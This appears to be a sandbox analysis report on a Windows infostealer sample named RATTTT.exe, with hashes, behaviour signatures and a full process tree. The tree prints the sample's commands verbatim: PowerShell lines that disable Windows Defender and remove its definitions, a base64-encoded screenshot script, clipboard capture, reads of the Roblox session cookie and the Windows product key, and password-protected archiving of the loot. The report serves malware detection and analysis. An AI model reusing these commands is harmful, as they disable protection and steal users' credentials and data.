Analysis

  • max time kernel
    10s
  • max time network
    16s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    01-02-2025 05:42

General

  • Target

    RATTTT.exe

  • Size

    7.6MB

  • MD5

    ebeaa340065ab95d55290cf3493fffe3

  • SHA1

    e8abeba9246adccd08d51802e91bcc8310fd95f8

  • SHA256

    e1393d279b6d5713326394ed56cd154954afecdd20ecc6b8991ee5d388365ba9

  • SHA512

    b4f1d321e5548bfe5f001da838d578da76f1a00163f6b4c3d3c1cc07ab221710a96295bdb8eb4a3099bfebf496c08f117d2aa585dad86eea077c99246f0a2e2c

  • SSDEEP

    196608:ODD+kdiwfI9jUCBB7m+mKOY7rXrZusooDmhfvsbnTNWC:85HIHL7HmBYXrYoaUNp

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 41 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RATTTT.exe
    "C:\Users\Admin\AppData\Local\Temp\RATTTT.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:432
    • C:\Users\Admin\AppData\Local\Temp\RATTTT.exe
      "C:\Users\Admin\AppData\Local\Temp\RATTTT.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3196
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RATTTT.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4424
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RATTTT.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4000
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3156
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:404
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup(' Reinstall Windows And It Should Work', 0, 'Wrong Windows Version', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4060
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup(' Reinstall Windows And It Should Work', 0, 'Wrong Windows Version', 0+16);close()"
          4⤵
            PID:1752
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3368
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:2712
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2596
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3416
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2784
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2120
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Clipboard Data
          • Suspicious use of WriteProcessMemory
          PID:1072
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Clipboard Data
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4588
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1632
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1180
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4376
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:2932
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4648
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:1680
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:5088
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:452
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\334bxzye\334bxzye.cmdline"
                5⤵
                  PID:3940
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES83E5.tmp" "c:\Users\Admin\AppData\Local\Temp\334bxzye\CSCEBAB895A9BA34E48991E9A80F93B9149.TMP"
                    6⤵
                      PID:464
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:232
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:1360
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5044
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:1524
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4100
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:3740
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4756
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:3160
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:4956
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:4660
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                            3⤵
                              PID:5076
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1848
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                              3⤵
                                PID:1636
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4408
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "getmac"
                                3⤵
                                  PID:3740
                                  • C:\Windows\system32\getmac.exe
                                    getmac
                                    4⤵
                                      PID:3180
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI4322\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\agpbA.zip" *"
                                    3⤵
                                      PID:4756
                                      • C:\Users\Admin\AppData\Local\Temp\_MEI4322\rar.exe
                                        C:\Users\Admin\AppData\Local\Temp\_MEI4322\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\agpbA.zip" *
                                        4⤵
                                        • Executes dropped EXE
                                        PID:5084
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                      3⤵
                                        PID:3628
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic os get Caption
                                          4⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:236
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                        3⤵
                                          PID:2196
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic computersystem get totalphysicalmemory
                                            4⤵
                                              PID:2480
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                            3⤵
                                              PID:808
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic csproduct get uuid
                                                4⤵
                                                  PID:3640
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                3⤵
                                                  PID:1676
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                    4⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3604
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                  3⤵
                                                    PID:4128
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic path win32_VideoController get name
                                                      4⤵
                                                      • Detects videocard installed
                                                      PID:452
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                    3⤵
                                                      PID:1312
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:788

                                                Network

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                  Filesize

                                                  3KB

                                                  MD5

                                                  74e4a39ae145a98de20041613220dfed

                                                  SHA1

                                                  ac5dd2331ae591d7d361e8947e1a8fba2c6bea12

                                                  SHA256

                                                  2c42785f059fe30db95b10a87f8cb64a16abc3aa47cb655443bdec747244ec36

                                                  SHA512

                                                  96ba3135875b0fe7a07a3cf26ad86e0df438730c8f38df8f10138184dacd84b8e0cded7e3e84475d11057ceefe2e357136762b9c9452fbb938c094323c6b729b

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  e3840d9bcedfe7017e49ee5d05bd1c46

                                                  SHA1

                                                  272620fb2605bd196df471d62db4b2d280a363c6

                                                  SHA256

                                                  3ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f

                                                  SHA512

                                                  76adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  6903d57eed54e89b68ebb957928d1b99

                                                  SHA1

                                                  fade011fbf2e4bc044d41e380cf70bd6a9f73212

                                                  SHA256

                                                  36cbb00b016c9f97645fb628ef72b524dfbdf6e08d626e5c837bbbb9075dcb52

                                                  SHA512

                                                  c192ea9810fd22de8378269235c1035aa1fe1975a53c876fe4a7acc726c020f94773c21e4e4771133f9fcedb0209f0a5324c594c1db5b28fe1b27644db4fdc9e

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  6f5b98ce0ad06ebb5c2ec11ffec5fbb1

                                                  SHA1

                                                  82e1ea9056feba9ddcc85791cd3994f8607ada84

                                                  SHA256

                                                  2cda8a09bad4890dd11d84c6c38c71f07130bfce58ce09f308452e9a650bad93

                                                  SHA512

                                                  bf0a7c56e2d3edc7169772008576edab790033fdab0678dda8b952c85ceafbdcaf38a208f25b1a2a05c3444de0f98fec923868d4bf1aa4201dda0f6b5b3128e6

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  7332074ae2b01262736b6fbd9e100dac

                                                  SHA1

                                                  22f992165065107cc9417fa4117240d84414a13c

                                                  SHA256

                                                  baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

                                                  SHA512

